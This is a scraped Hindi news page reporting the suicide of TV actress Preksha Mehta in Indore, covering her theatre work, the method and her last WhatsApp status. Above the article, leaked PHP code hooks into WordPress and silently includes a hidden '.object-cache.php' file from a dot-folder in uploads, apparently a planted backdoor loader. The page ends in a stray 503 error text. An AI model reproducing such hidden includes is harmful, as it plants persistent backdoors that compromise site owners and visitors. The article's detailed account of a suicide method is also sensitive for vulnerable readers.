add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इंदौर की इस TV एक्ट्रेस ने की खुदकुशी, Whatsapp स्टेटस लगा बताई मौत की वजह – SOCH INDIA
Menu

देश
इंदौर की इस TV एक्ट्रेस ने की खुदकुशी, Whatsapp स्टेटस लगा बताई मौत की वजह

nobanner

टीवी कलाकार प्रेक्षा मेहता ने इंदौर के बजरंग नगर स्थित अपने घर में सोमवार देर रात फांसी लगाकर आत्महत्या कर ली. प्रेक्षा मुंबई में रहती थीं. वह लॉकडाउन शुरू होने के पहले ही इंदौर अपने घर लौटी थीं. प्रेक्षा ने क्राइम पेट्रोल के कई एपिसोड में अभिनय किया था.

आपको बता दें कि थिएटर में प्रेक्षा की शुरुआत अभिजीत वाडकर, संतोष रेगे और नगेंद्र सिंह राठौर के नाट्य ग्रुप ‘ड्रामा फैक्टरी’ से हुई. मंटो के लिखे नाटक ‘खोल दो’ पर उन्होंने अपना पहला स्टेज परफॉर्म किया था. उन्होंने ‘खूबसूरत बहू’, ‘बूंदें’, ‘राक्षस’, ‘प्रतिबिंब’, ‘पार्टनर्स’, ‘हां’, ‘थ्रिल’, ‘अधूरी औरत’ जैसे नाटकों में काम कर चुकी थीं.

उन्हें अभिनय के लिए भी तीन राष्ट्रीय नाट्य उत्सवों में फर्स्ट प्राइज मिल चुका था. एकल नाट्य ‘सड़क के किनारे’ में शानदार अभिनय के लिए भी उन्होंने अवार्ड जीता था. अभिनय करने की ललक ने ही आज प्रेक्षा की जान लेली. परिवार का कहना है लॉकडाउन में काम बंद होने के कारण प्रेक्षा तनाव में थीं.

सुसाइड करने से पहले प्रेक्षा ने सोशल मीडिया पर अपना स्टेटस अपडेट किया. उसमें उन्होंने अवतार सिंह पाश की कविता की पंक्तियां ‘सबसे बुरा होता है सपनों का मर जाना….’ लिखी थीं. Whatsapp पर उनका यही आखिरी स्टेटस था, हालांकि पुलिस प्रेक्षा के आत्महत्या करने के पीछे अन्य वजहों की भी पड़ताल कर रही है.

Share this: 503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.